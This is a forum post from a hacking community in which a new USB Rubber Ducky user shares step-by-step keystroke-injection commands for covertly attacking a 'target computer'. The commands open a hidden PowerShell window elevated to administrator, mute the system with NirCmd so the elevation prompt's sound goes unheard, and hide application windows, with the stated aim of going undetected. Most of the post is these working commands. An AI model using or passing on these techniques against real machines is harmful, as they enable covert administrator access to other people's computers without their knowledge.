SilentHacker Posted September 8, 2015 Share Posted September 8, 2015 Hi! Before anything else, I should mention that I am new to all of this (my Rubber Ducky hasn't even arrived yet), but I've been digging around and I think I've come up with a pretty decent alternative to hiding windows in Windows (without having them scroll down and out of sight, which is very unstealth-like). Like I've mentioned, my Rubber Ducky hasn't arrived yet, so I haven't gotten around to learning the script to its fullest for that reason I'm going to be sharing what the ducky should do, step-by-step, instead of the actual inject.bin. The Stealth enhancer: After having the Ducky open the run command (GUI + R) instead of having it write something like "cmd" or "powershell", give this a try and see for yourself: powershell -windowstyle hidden start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit Now you have to make the ducky go LEFT and ENTER to accept opening powershell as administrator. You can still catch a few glimpses of the 2 powershell windows that get open, but they immediately disappear. Although it's not visible, one of the windows IS STILL OPEN so long as you don't click anywhere else. To prove that the powershell running as administrator is still open, type this out (without quotes,it's important that you type it): "start-process notepad.exe", this will open the notepad. This works fine all my computers (Windows 8 and 10), I'm not sure about others, please let me know. Removing the "Run as Admin" sound: Some computers have this annoying warning sound when the box to confirm to run something as admin pops-up. This sound is specially annoying if you want to go undetected. There are two alternatives: 1) You could make the Ducky type "FN + ESC", this will mute or unmute the computer. The problem with this option is that, if the target computer is already muted, this will produce the contrary effect of the desired one. So if you are using this one, make sure the target computer is not muted. 2) For this one we need the help of a tool called NirCmd, this tool is, I believe, a great asset for the Rubber Ducky users. The potential for pranks is enormous. Here's what to do: - First of all, you should get NirCmd: http://www.nirsoft.net/utils/nircmd.zip - Unzip the file and copy the "nircmd.exe" or "nircmd" to the Rubber Ducky's SD card. - Next make the Rubber Ducky run this after (GUI + R): powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 0';exit What this does is open a hidden powershell, mutes the system, the dialog box pops up, a hidden administrator run powershell opens (closing the previous one) and restores sound to the system. Alternatively, you could run this (if you don't want to restore sound to the system and keep it muted): powershell -windowstyle hidden F:/nircmd/nircmd.exe mutesysvolume 1; start-process powershell.exe -Verb runAs -argumentlist '-windowstyle hidden';exit WARNING: Make sure to change "F:/nircmd/nircmd.exe" to whatever path your nircmd.exe file has on your ducky. Other applications for nircmd: - open and hide apps. (Open notepad and hide it, but it remains active and you can write whatever you want as long as you don't click anywhere else) start-process notepad.exe; F:/nircmd/nircmd.exe win hide class notepad I don't know the full extent of this "hide" feature I tried it with google chrome, but I didn't know the "class" so it didn't work. Play around with it and let me know. - show hidden apps. F:/nircmd/nircmd.exe win show class notepad - Make the computer read a text file (Cool Prank) F:/nircmd/nircmd.exe speak file "c:\temp\speak.txt" This is all I have had time to play with in the past few days, please point out any mistakes I might have made and let me know on your ideas. Play around with NirCmd's other features and share it here. Sorry for the messy post. Quote Link to comment Share on other sites More sharing options...
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.